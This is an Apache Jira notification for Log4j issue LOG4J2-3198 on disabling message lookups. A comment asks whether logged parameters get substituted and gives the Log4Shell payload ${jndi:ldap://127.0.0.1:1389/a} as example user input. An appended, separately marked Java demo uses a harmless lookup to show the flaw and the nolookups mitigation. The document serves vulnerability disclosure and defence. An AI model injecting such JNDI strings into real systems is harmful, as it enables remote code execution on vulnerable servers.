Posted to notifications@logging.apache.org by "Eric Everman (Jira)" <ji...@apache.org> on 2021/12/10 18:01:00 UTC

[jira] [Comment Edited] (LOG4J2-3198) Message lookups should be disabled by default

    [ https://issues.apache.org/jira/browse/LOG4J2-3198?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17457298#comment-17457298 ] 

Eric Everman edited comment on LOG4J2-3198 at 12/10/21, 6:00 PM:
-----------------------------------------------------------------

Is there any possible configuration where the text of substituted parameters is itself substituted? For instance:
{code:java}
logger.debug("User entered '{}', which is invalid", request.getParameter());{code}
and 'request.getParameter()' returns something like:
{code:java}
${jndi:ldap://127.0.0.1:1389/a}{code}
??


Apparently the answer is 'yes', at least according to the [lunasec.io post on this vulnerability|https://www.lunasec.io/docs/blog/log4j-zero-day/].


was (Author: eeverman@usgs.gov):
Is there any possible configuration where the text of substituted parameters is itself substituted? For instance:
{code:java}
logger.debug("User entered '{}', which is invalid", request.getParameter());{code}
and 'request.getParameter()' returns something like:
{code:java}
${jndi:ldap://127.0.0.1:1389/a}{code}
??

> Message lookups should be disabled by default
> ---------------------------------------------
>
>                 Key: LOG4J2-3198
>                 URL: https://issues.apache.org/jira/browse/LOG4J2-3198
>             Project: Log4j 2
>          Issue Type: Improvement
>          Components: Layouts
>    Affects Versions: 2.14.1
>            Reporter: Carter Kozak
>            Assignee: Carter Kozak
>            Priority: Major
>             Fix For: 2.15.0
>
>
> Lookups in messages are confusing, and muddy the line between logging APIs and implementation. Given a particular API, there's an expectation that a particular shape of call will result in specific results. However, lookups in messages can be passed into JUL and will result in resolved output in log4j formatted output, but not any other implementations despite no direct dependency on those implementations.
> There's also a cost to searching formatted message strings for particular escape sequences which define lookups. This feature is not used as far as we've been able to tell searching GitHub and Stack Overflow, so it's unnecessary for every log event in every application to burn several CPU cycles searching for the value.
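The following is an added example, not code from the Jira thread or from the Log4j project, that lets a defender confirm the behaviour Eric Everman asks about above and see the setting that turns it off. It assumes log4j-core at the affected version listed on the issue (2.14.1) is on the classpath; on 2.15.0 and later the second case is already the default. The input string is a constructed stand-in for request.getParameter(...): it uses the local, network-free `${java:version}` lookup rather than the JNDI string from the comment, so the only observable effect is text substitution. `%m{nolookups}`, the `log4j2.formatMsgNoLookups` system property and `Configurator.reconfigure(Configuration)` are real Log4j 2 features; the class and method names in the example itself are the author's own.

```java
import org.apache.logging.log4j.Level;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.apache.logging.log4j.core.config.Configurator;
import org.apache.logging.log4j.core.config.builder.api.ConfigurationBuilder;
import org.apache.logging.log4j.core.config.builder.api.ConfigurationBuilderFactory;
import org.apache.logging.log4j.core.config.builder.impl.BuiltConfiguration;

/**
 * Added example (not from the Jira thread): logs the same parameterized
 * message twice, once through the default message pattern and once through
 * %m{nolookups}, so the difference in the emitted line is directly visible.
 */
public class MessageLookupDemo {

    // Constructed stand-in for request.getParameter(...). The java: lookup
    // resolves locally, so nothing leaves the JVM if substitution happens.
    static final String UNTRUSTED_INPUT = "${java:version}";

    /** Build a console-only configuration whose PatternLayout uses the given pattern. */
    static void configure(String pattern) {
        ConfigurationBuilder<BuiltConfiguration> b =
                ConfigurationBuilderFactory.newConfigurationBuilder();
        b.add(b.newAppender("stdout", "Console")
                .add(b.newLayout("PatternLayout").addAttribute("pattern", pattern)));
        b.add(b.newRootLogger(Level.DEBUG).add(b.newAppenderRef("stdout")));
        // Replaces the active configuration (available since Log4j 2.12).
        Configurator.reconfigure(b.build());
    }

    public static void main(String[] args) {
        Logger logger = LogManager.getLogger(MessageLookupDemo.class);

        // Case 1, default pattern on 2.14.1: the formatted message, including the
        // parameter value, is scanned for ${...}, so the line shows the JVM version
        // instead of the literal text the user supplied.
        configure("[default]   %m%n");
        logger.debug("User entered '{}', which is invalid", UNTRUSTED_INPUT);

        // Case 2, hardened pattern: %m{nolookups} writes the parameter verbatim, so
        // the line contains the literal string ${java:version}. Starting the JVM with
        // -Dlog4j2.formatMsgNoLookups=true (2.10+) applies the same rule to every
        // PatternLayout without touching each pattern; 2.15.0 made it the default.
        configure("[nolookups] %m{nolookups}%n");
        logger.debug("User entered '{}', which is invalid", UNTRUSTED_INPUT);
    }
}
```

Run it with log4j-api and log4j-core 2.14.1 on the classpath and compare the two lines: the first one changing from what the caller passed in is the behaviour the comment above confirms, and a line that still reads `${java:version}` after the second configuration shows that the layout setting, not input filtering, is what stops the substitution.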



--
This message was sent by Atlassian Jira
(v8.20.1#820001)